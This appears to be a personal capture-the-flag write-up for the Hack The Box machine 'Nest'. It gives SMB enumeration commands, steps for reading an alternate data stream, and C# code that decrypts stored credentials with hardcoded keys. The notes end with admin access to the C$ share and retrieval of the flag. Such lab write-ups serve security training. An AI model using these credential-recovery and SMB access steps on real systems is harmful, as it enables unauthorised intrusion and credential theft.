Nest

- Commands can be run by adding -C flag (automatically sends CRLF) in nc nc -Cv nest.htb 4386 telnet nest.htb 4386 - SMB Share with some sort of misconfiguration smbclient -U '' -L nest.htb get "<filename-with-spaces>" - Listing directories and files recursively smbmap -H 10.10.10.178 -u '' -R smbmap -H 10.10.10.178 -u '[redacted]' -p '[redacted]' -R - Downloading files ending with .xml smbmap -H 10.10.10.178 -u '[redacted]' -p '[redacted]' -R -A '.xml' cat 10.10.10.178-Data_IT_Configs_RU\ Scanner_RU_config.xml <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>[redacted]</Username> <Password>[redacted]</Password> </ConfigFile> - Password is encrypted string [Didn't work] smbclient -U "[redacted]%$(echo '[redacted]' | base64 -d)" nest.htb -L - SMB root folder not accessible but child folder 'Carl' is

cat 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_config.xml <History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History> - Decrypting user password - Convert the file 'Utils.vb' to a C-sharp file. https://converter.telerik.com/ Note: tried : 'wine64 cscript Utils.vb' to compile but there were errors [to-do?] - Add 'public static void main' to the 'Utils' class and create an object to call the 'Decrypt function'. Remove 'static' from 'Decrypt' function.

using System;
using System.Text;
using System.Security.Cryptography;

public class Utils
{
    public static string GetLogFilePath()
    {
        return System.IO.Path.Combine(Environment.CurrentDirectory, "Log.txt");
    }

    public string DecryptString(string EncryptedString)
    {
        if (string.IsNullOrEmpty(EncryptedString))
            return string.Empty;
        else
            return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256);
    }

    public static string EncryptString(string PlainString)
    {
        if (string.IsNullOrEmpty(PlainString))
            return string.Empty;
        else
            return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256);
    }

    public static string Encrypt(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
    {
        byte[] initVectorBytes = Encoding.ASCII.GetBytes(initVector);
        byte[] saltValueBytes = Encoding.ASCII.GetBytes(saltValue);
        byte[] plainTextBytes = Encoding.ASCII.GetBytes(plainText);
        Rfc2898DeriveBytes password = new Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations);
        byte[] keyBytes = password.GetBytes(System.Convert.ToInt32(keySize / (double)8));
        AesCryptoServiceProvider symmetricKey = new AesCryptoServiceProvider();
        symmetricKey.Mode = CipherMode.CBC;
        ICryptoTransform encryptor = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes);
        using (System.IO.MemoryStream memoryStream = new System.IO.MemoryStream())
        {
            using (CryptoStream cryptoStream = new CryptoStream(memoryStream, encryptor, CryptoStreamMode.Write))
            {
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length);
                cryptoStream.FlushFinalBlock();
                byte[] cipherTextBytes = memoryStream.ToArray();
                memoryStream.Close();
                cryptoStream.Close();
                return Convert.ToBase64String(cipherTextBytes);
            }
        }
    }

    public static string Decrypt(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
    {
        byte[] initVectorBytes;
        initVectorBytes = Encoding.ASCII.GetBytes(initVector);

        byte[] saltValueBytes;
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue);

        byte[] cipherTextBytes;
        cipherTextBytes = Convert.FromBase64String(cipherText);

        Rfc2898DeriveBytes password = new Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations);

        byte[] keyBytes;
        keyBytes = password.GetBytes(System.Convert.ToInt32(keySize / (double)8));

        AesCryptoServiceProvider symmetricKey = new AesCryptoServiceProvider();
        symmetricKey.Mode = CipherMode.CBC;

        ICryptoTransform decryptor;
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes);

        System.IO.MemoryStream memoryStream;
        memoryStream = new System.IO.MemoryStream(cipherTextBytes);

        CryptoStream cryptoStream;
        cryptoStream = new CryptoStream(memoryStream, decryptor, CryptoStreamMode.Read);

        byte[] plainTextBytes;
        plainTextBytes = new byte[cipherTextBytes.Length + 1];

        int decryptedByteCount;
        decryptedByteCount = cryptoStream.Read(plainTextBytes, 0, plainTextBytes.Length);

        memoryStream.Close();
        cryptoStream.Close();

        string plainText;
        plainText = Encoding.ASCII.GetString(plainTextBytes, 0, decryptedByteCount);

        return plainText;
    }
    
    public static void Main(string[] args)
    {
        Console.WriteLine ("Hello Mono World");
        Utils dec = new Utils();
        string temp=dec.DecryptString("[redacted]");
        Console.WriteLine(temp);
    }
}

- mcs Utils.cs - mono Utils.exe - smbclient -U '[redacted]%[redacted]' //10.10.10.178/Users - Fetching Debug password https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/ - smbclient -U '[redacted]%[redacted]' //10.10.10.178/Users - allinfo "Debug Mode Password.txt" - get "Debug Mode Password.txt:Password" Debug mode password - [redacted] - LDAP Data - setdir ..\ldap - showquery 2 [Ldap.conf] Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=[redacted] - Decompiling HQLdap.exe - ilspy - Open HQLdap.exe

- Save code for class "CR" - Add the following code inside the class "CR":

public static void Main(String [] args){
Console.WriteLine("Program Running");
CR dec = new CR();
String temp = CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=");
Console.WriteLine(temp);
}

- mcs CR.cs - mono CR.exe - Accessing Administrator directory - smbclient -U 'administrator%[redacted]' //10.10.10.178/C$ - cd Users/Administrator/Desktop/ - get flag.txt -

PreviousSauna NextWordpress CVE-2021-29447

Last updated 3 years ago